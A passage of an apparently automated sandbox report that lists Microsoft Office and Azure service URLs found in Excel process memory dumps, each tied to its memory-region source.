    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.982109381.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975647498.0000000012A2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/%
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://management.azure.com
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t35
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.comh
    Source: EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyq
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeform
    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformsTL
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
    Source: EXCEL.EXE, 00000000.00000003.843183834.0000000012B8E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rulesI
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comSocket
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord?
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comYVQ
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netQ
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/v
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886998111.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885647644.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.981208591.000000000F1DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847975213.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792735912.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728068587.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.976405723.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846255300.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980144579.000000000D3B2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831001042.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844416194.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831097554.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830040701.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843365672.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728182877.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829142024.0000000012A3F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845815973.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792243288.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829943784.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847661553.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844255117.000000000F125000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887363986.000000000F1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843447487.000000000F1D8000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com4
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8M?
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com:
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comH
    Source: EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comle2.tlb
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comv
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comy
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comzXU
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 